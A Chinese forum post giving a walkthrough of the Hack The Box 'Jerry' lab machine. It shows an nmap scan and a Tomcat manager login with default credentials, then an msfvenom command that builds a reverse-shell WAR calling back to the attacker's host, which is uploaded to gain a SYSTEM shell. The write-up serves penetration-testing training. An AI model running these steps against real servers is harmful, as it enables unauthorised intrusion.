电脑疯子技术论坛|电脑极客社区

微信扫一扫 分享朋友圈

已有 2570 人浏览分享

HTB:Jerry渗透测试

[复制链接]
2570 0
基础信息

简介:Hack The Box是一个在线渗透测试平台。可以帮助你提升渗透测试技能和黑盒测试技能平台
环境都是模拟的真实环境有助于自己更好的适应在真实环境的渗透
链接:https://www.hackthebox.eu/home/machines/profile/144
描述:

QQ截图20210616164409.png

前言

本次演练使用kali系统按照渗透测试的过程进行操作 通过nmap发现端口开放了tomcat8080端口
使用密码登录tomcat 使用msfvenom 生成war文件上传到tomcat中 通过反弹获取shell。

一、信息收集

1、靶机ip

IP地址为:10.10.10.95

QQ截图20210616164519.png

2、靶机端口与服务
  1. nmap -sV -sS -T4 -O -A 10.10.10.95
复制代码

99.png

  1. PORT     STATE SERVICE VERSION
  2. 8080/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1
  3. |_http-server-header: Apache-Coyote/1.1
  4. |_http-title: Apache Tomcat/7.0.88
复制代码

3、网站信息收集

查看8080端口

QQ截图20210616164712.png

通过dirsearch进行目录扫描获取网站目录

98.png

这里我列出了部分需要的目录
  1. /host-manager/html
  2. /manager/html
  3. /manager/
复制代码

二、漏洞探测与利用

1、生成木马文件

进入/host-manager/html目录发现需要账号密码

96.png

点击取消后 再返回界面发现账号与密码

28.png

username="tomcat"
password="s3cret"
使用该密码进行登录 返回403页面无法正常进行登录

26.png

最后在/manager/目录下成功登录

22.png

发现可以上传war格式文件
使用msfvenom生成shell文件
  1. msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.1
  2. 4.2 LPORT=4444 -f war > shell.war
复制代码

21.png

2、使用msf获取shell
首先设置好msf 使用msf监听4444端口获取反弹的shell

20.png

在登陆页面上传war文件

19.png

上传成功后点击shell

12.png

成功获取到shell

11.png

三、提权

使用这种方式所获取的直接是authority权限可直接查看root.txt

10.png

进入 \Users\Administrator\Desktop目录发现没有root.txt但是存在flags

9.png

进入flags目录使用type命令查看2 for the price of 1.txt文件
获取到root.txt与user.txt

8.png

您需要登录后才可以回帖 登录 | 注册

本版积分规则

1

关注

0

粉丝

9021

主题
精彩推荐
热门资讯
网友晒图
图文推荐

Powered by Pcgho! X3.4

© 2008-2022 Pcgho Inc.